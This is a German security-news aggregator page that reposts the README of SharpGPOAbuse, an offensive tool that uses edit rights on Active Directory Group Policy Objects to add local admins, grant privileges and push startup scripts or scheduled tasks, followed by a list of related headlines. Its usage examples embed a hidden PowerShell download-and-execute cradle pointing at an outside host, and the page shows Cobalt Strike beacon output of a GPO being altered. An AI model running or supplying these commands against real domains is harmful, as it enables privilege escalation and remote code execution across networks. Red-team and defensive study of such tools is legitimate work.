Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ SharpGPOAbuse - Tool To Take Advantage Of A User'S Edit Rights On A Group Policy Object (GPO) In Order To Compromise The Objects That Are Controlled By That GPO

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š SharpGPOAbuse - Tool To Take Advantage Of A User'S Edit Rights On A Group Policy Object (GPO) In Order To Compromise The Objects That Are Controlled By That GPO


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse


Compile Instructions

Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.


Usage
Usage:
SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attack Options

Adding User Rights
Options required to add new user rights:
--UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
Set the account to add the new rights.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

Adding a Local Admin
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Configuring a User or Computer Logon Script
Options required to add a new user or computer startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Configuring a Computer or User Immediate Task
Options required to add a new computer or user immediate task:

--TaskName
Set the name of the new computer task.
--Author
Set the author of the new task (use a DA account).
--Command
Command to execute.
--Arguments
Arguments passed to the command.
--GPOName
The name of the vulnerable GPO.

Additional User Task Options:
--FilterEnabled
Enable Target Filtering for user immediate tasks.
--TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
The targeted user's SID.

Additional Computer Task Options:
--FilterEnabled
Enable Target Filtering for computer immediate tasks.
--TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.

Example:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com


Additional Options
Option Description
--DomainController Set the target domain controller
--Domain Set the target domain
--Force Overwrite existing files if required

Example Output
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I
EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {87 7CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!


...



๐Ÿ“Œ pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse


๐Ÿ“ˆ 35.21 Punkte

๐Ÿ“Œ Styra now enables highly regulated industries to take advantage of cloud-native authorization policy


๐Ÿ“ˆ 31.91 Punkte

๐Ÿ“Œ UK police's face recognition tech breaks human rights laws. Outlaw it, civil rights group urges Court of Appeal


๐Ÿ“ˆ 31.29 Punkte

๐Ÿ“Œ sssd Group Policy Objects privilege escalation [CVE-2018-16838]


๐Ÿ“ˆ 29.64 Punkte

๐Ÿ“Œ sssd Group Policy Objects privilege escalation [CVE-2018-16838]


๐Ÿ“ˆ 29.64 Punkte

๐Ÿ“Œ Category Order and Taxonomy Terms Order <= 1.5.2.2 - Authenticated PHP Object Injection


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Oracle PeopleSoft Enterprise FIN Common Application Objects Common Objects cross site scripting


๐Ÿ“ˆ 28.13 Punkte

๐Ÿ“Œ ES6 Map an Array of Objects to Return an Array of Objects With New Keys


๐Ÿ“ˆ 28.13 Punkte

๐Ÿ“Œ Everyday objects as JavaScript objects


๐Ÿ“ˆ 28.13 Punkte

๐Ÿ“Œ CVE-2022-44108 | pdftojson 94204bb Object.cc Object::copy(Object*) stack-based overflow


๐Ÿ“ˆ 27.94 Punkte

๐Ÿ“Œ Facebook May Finally Have To Compromise Its User Experience In Order To Keep Growing


๐Ÿ“ˆ 27.62 Punkte

๐Ÿ“Œ Edit Group Policy in Windows 10: Everything You Need to Know


๐Ÿ“ˆ 27 Punkte

๐Ÿ“Œ [dos] iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address


๐Ÿ“ˆ 26.08 Punkte

๐Ÿ“Œ #0daytoday #iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled A [#0day #Exploit]


๐Ÿ“ˆ 26.08 Punkte

๐Ÿ“Œ GitHub - CASES-LU/MOSP: A platform to create, edit and share security JSON objects.


๐Ÿ“ˆ 25.49 Punkte

๐Ÿ“Œ WSUS reboot question GPO


๐Ÿ“ˆ 25.31 Punkte

๐Ÿ“Œ How to Mitigate the Windows Font Parsing Zero-Day Bug via GPO


๐Ÿ“ˆ 25.31 Punkte

๐Ÿ“Œ Fehlerhafte Verknรผpfungen: GPO-Probleme nach Windows 10 Patch-Day


๐Ÿ“ˆ 25.31 Punkte

๐Ÿ“Œ Windows 11 GPO "Enable MPR notifications โ€ฆ" zur Sicherheit setzen


๐Ÿ“ˆ 25.31 Punkte

๐Ÿ“Œ Finding that one GPO Setting in a Pool of Hundreds of GPOs, (Tue, Jan 17th)


๐Ÿ“ˆ 25.31 Punkte

๐Ÿ“Œ Windows 11: Fix fรผr GPO-Bug in "Settings Page Visibility" mit Nov. 2023-Update behoben


๐Ÿ“ˆ 25.31 Punkte

๐Ÿ“Œ Letยดs Talk about: Group Policy Object - Gruppenrichtlinien


๐Ÿ“ˆ 24.89 Punkte

๐Ÿ“Œ DLL side-loading Attack Takes Advantage of Windows Search Order to Inject Malicious DLL


๐Ÿ“ˆ 24.88 Punkte

๐Ÿ“Œ UN Experts to Trump Administration: Reproductive Rights are Human Rights


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ Defending Womenโ€™s Rights Is Not Terrorism: A Saudi Prosecution on Human Rights Day


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ EXCLUSIVE: Draft Charter of Pompeoโ€™s โ€œCommission on Unalienable Rightsโ€ Hides Anti-Human Rights Agenda


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ Trumpโ€™s โ€œUnalienable Rightsโ€ Commission Likely to Promote Anti-Rights Agendaย 


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ Jahresbericht von Human Rights Watch: Human Rights Watch warnt vor chinesischem Angriff auf Menschenrechte


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ Transforming the US Human Rights Report to Reflect Gender Rights โ€” and Security


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ Abortion Rights are Privacy Rights - ThreatWire


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ The Human Rights Lessons from COVID-19: Equality Requires Economic and Social Rights Protections


๐Ÿ“ˆ 24.14 Punkte

๐Ÿ“Œ COVID-19 and International Law Series: Human Rights Law โ€“ Civil and Political Rights


๐Ÿ“ˆ 24.14 Punkte











matomo